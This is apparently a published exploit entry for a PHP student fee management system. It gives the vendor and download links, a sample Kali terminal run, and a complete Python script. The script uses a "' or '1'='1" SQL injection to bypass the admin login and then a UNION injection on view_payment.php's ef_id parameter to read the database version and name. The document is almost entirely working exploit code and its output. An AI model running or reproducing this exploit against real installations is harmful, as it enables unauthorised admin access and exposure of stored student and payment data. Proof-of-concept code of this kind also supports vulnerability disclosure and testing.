- Vendor Homepage: https://www.sourcecodester.com/php/15357/best-fee-management-system-project-php-source-code.html

- Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/click_fees_0.zip

┌──(kali㉿kali)-[~/Lab/oswe/py/click_fees_sqli]

└─$ python3 click_fees.py "http://localhost/click_fees"

>> Student fees management system project - SQLi authentication Bypass and SQLi on Payment View

>> by twseptian

[*] Bypass Login...

[✓] Success login to Admin Page

[*] Looking for a database and version...

[✓] Found the database version: 10.6.7-MariaDB-3

[✓] Found the database name: clickfees_db

import requests

import sys

import urllib3

from bs4 import BeautifulSoup

import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class Interface ():

def __init__ (self):

self.red = '\033[91m'

self.green = '\033[92m'

self.white = '\033[37m'

self.yellow = '\033[93m'

self.bold = '\033[1m'

self.end = '\033[0m'

def header(self):

print('\n >> Student fees management system project - SQLi authentication Bypass and SQLi on Payment View')

print(' >> by twseptian\n')

def info (self, message):

print(f"[{self.white}*{self.end}] {message}")

def warning (self, message):

print(f"[{self.yellow}!{self.end}] {message}")

def error (self, message):

print(f"[{self.red}x{self.end}] {message}")

def success (self, message):

print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")

global output

output = Interface()

output.header()

proxies = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}

def bypass_login(s, url):

global cookies

path = "/ajax.php?action=login"

data = {"username":"admin' or '1'='1';-- -","password":"hahahah"}

response = s.post(url+path,data=data,proxies=proxies,verify=False)

status = response.status_code

if status == 200:

cookies = response.cookies.get_dict()

return True

else:

return False

def sqli_database(s,url):

headers = {

"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0",

"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",

"Accept-Language": "en-US,en;q=0.5","Accept-Encoding": "gzip, deflate",

"Upgrade-Insecure-Requests": "1","Sec-Fetch-Dest": "document",

"Sec-Fetch-Mode": "navigate","Sec-Fetch-Site": "none",

"Sec-Fetch-User": "?1"

}

start_path= "/view_payment.php?ef_id="

sqli_payload = "-9270 UNION ALL SELECT 82,82,82,82,82,82,version(),82,database()-- -"

end_path = "&pid=4"

response = s.get(url + start_path + sqli_payload + end_path, cookies=cookies, headers=headers,proxies=proxies, verify=False)

soup = BeautifulSoup(response.text, 'html.parser')

database_version = soup.find(text="Student: ").parent.findNext('b').contents[0]

database_target = soup.find(text="Course/Level: ").parent.findNext('b').contents[0]

return database_version,database_target

if __name__ == "__main__":

try:

url = sys.argv[1].strip()

except IndexError:

output.info("Usage: %s <url>" %sys.argv[0])

output.info("Example: %s www.example.com" %sys.argv[0])

sys.exit(-1)

s = requests.Session()

output.info("Bypass Login...")

if bypass_login(s, url):

output.success("Success login to Admin Page")

output.info("Looking for a database and version...")

database_version, database_target = sqli_database(s, url)

if database_target:

output.success("Found the database version: %s" % database_version)

output.success("Found the database name: %s" % database_target)

else:

output.error("Did not find a database name.")

else:

output.error("Did not login to Admin Page")